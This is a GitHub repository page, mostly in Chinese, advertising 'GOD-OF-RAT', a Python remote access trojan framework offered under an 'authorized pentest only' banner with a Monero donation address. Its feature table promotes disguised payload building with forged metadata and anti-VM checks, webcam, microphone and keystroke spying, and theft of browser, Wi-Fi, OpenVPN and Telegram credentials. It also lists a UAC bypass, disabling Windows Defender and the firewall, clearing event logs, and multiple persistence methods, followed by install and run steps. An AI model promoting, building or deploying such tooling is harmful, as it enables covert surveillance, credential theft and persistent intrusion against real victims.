Katastrofa0/GOD-OF-RAT

GitHub: Katastrofa0/GOD-OF-RAT

一款基于 Python asyncio 的远程管理工具框架，为授权渗透测试提供从 C2 通信、payload 生成到远程监控、凭证收集与持久化的完整功能链。

Stars: 3 | Forks: 1

THE BEST PYTHON RAT FRAMEWORK

⚠️For authorized pentest only⚠️

_{我把它完全免费提供给你们，希望能得到任何帮助（不是为了买咖啡，而是为了我的第一辆车）}

_^XMR

_{^{44mVG1Uy1dsDSdnjTtbQ5CAVKRT1wqQsF1LgRPkK7ED6gHWMU4za3GrQo82NvnpbfkBZFnKQm3ybPemj1ZAaNAsyL2DfVhq}}

这是最方便、最人性化的 Python RAT 框架，由 async 驱动，使用起来极其愉悦。

### ◈ 您将获得 | 类别 | 功能 | | :--- | :--- | | **异步 C2 核心** | 一个 Python asyncio server，可同时处理数百个 agent。它快速、稳定，在负载下也不会卡顿。 | | **Agent 构建器** | 一个用于构建 payload 的简单 GUI。选择你想要的模块，添加 AES 密钥，更改图标或从其他人的 EXE 中复制图标，伪造文件元数据，开启反虚拟机（Anti‑VM）保护，填充文件大小，或设置自动持久化。一切都在你点击编译之前完成。 | | **Telegram Bot 多路复用器** | 你可以同时运行多个 Telegram bot。每个用户都有自己独立的会话，使团队合作干净有序。 | | **AES‑256 加密** | 服务器、控制器和 agent 之间的所有流量都经过加密。如果你只是想进行测试，可以切换到纯文本模式。 | | **远程 Shell** | 一个交互式命令行，就像你的本地终端一样工作。执行任何系统命令并实时查看输出。 | | **文件管理器** | 浏览远程文件，通过拖放进行上传，下载任何内容，删除文件，或运行可执行文件。文件夹在上传前会自动压缩。使用起来非常令人满意。 | | **实时监控** | 实时流式传输目标屏幕，通过他们的网络摄像头进行监视，监听他们的麦克风，截取屏幕截图，或者连续或在设定的时间内记录每一次击键。 | | **最佳键盘记录器** | 键盘记录器是本框架最出色的部分之一。绝对支持任何键盘布局。输出干净、易读，没有任何垃圾字符或多余符号。 | | **凭证收集** | 提取已保存的 Wi‑Fi 密码，来自 Chrome、Edge、Firefox 和 Brave 的浏览器登录信息，OpenVPN 凭证，以及整个 Telegram 会话文件夹。 | | **规避与持久化** | 使用 Fodhelper 技巧绕过 UAC。禁用 Windows Defender，关闭防火墙，避免虚拟机检测，并清除事件日志。为了维持访问权限，你可以使用注册表（Registry）自动运行、启动文件夹快捷方式、计划任务、WMI 事件订阅，或者将其安装为 Windows 服务。 | | **Windows 管理** | 远程编辑注册表，管理服务，查看计划任务，控制 WMI 订阅，以及终止或监视进程。 | | **趣味模块** | 缩放屏幕，反转鼠标移动，让鼠标像喝醉了一样，摇晃窗口，在光标后留下幽灵轨迹，显示无尽的警告弹窗，或禁用任务管理器。功能远不止于此。 |

_{欢迎随时提交 PR、建议新模块或改进现有模块。}

_{让我们将这个框架打造成一项社区共同努力的成果。}

### ◈ 快速开始 ``` git clone https://github.com/Katastrofa0/GOD-OF-RAT.git cd GOD-OF-RAT pip install -r requirements.txt ``` ``` python server.py [--aes-key '$aeskey'] # Start server python controller.py # Launch GUI (another terminal) # 确保 encryption.py 与 server.py 位于同一目录中 ``` 如果你遇到了一些关于 PyAudio 和 Crypto 的麻烦，请像这样安装： ``` pip install pipwin pipwin install pyaudio pip uninstall crypto pycrypto pip install pycryptodome ``` 此外，为了获得最佳的图标提取体验，请下载并安装 VC_redist： ``` https://aka.ms/vs/17/release/vc_redist.x64.exe ```

包含设置说明和详细模块描述的完整文档可在此处获取：

https://god-of-rat.gitbook.io/god-of-rat

标签：C2框架, DNS 反向解析, Python, 安全学习资源, 异步编程, 无后门, 计算机取证, 远程管理工具, 逆向工具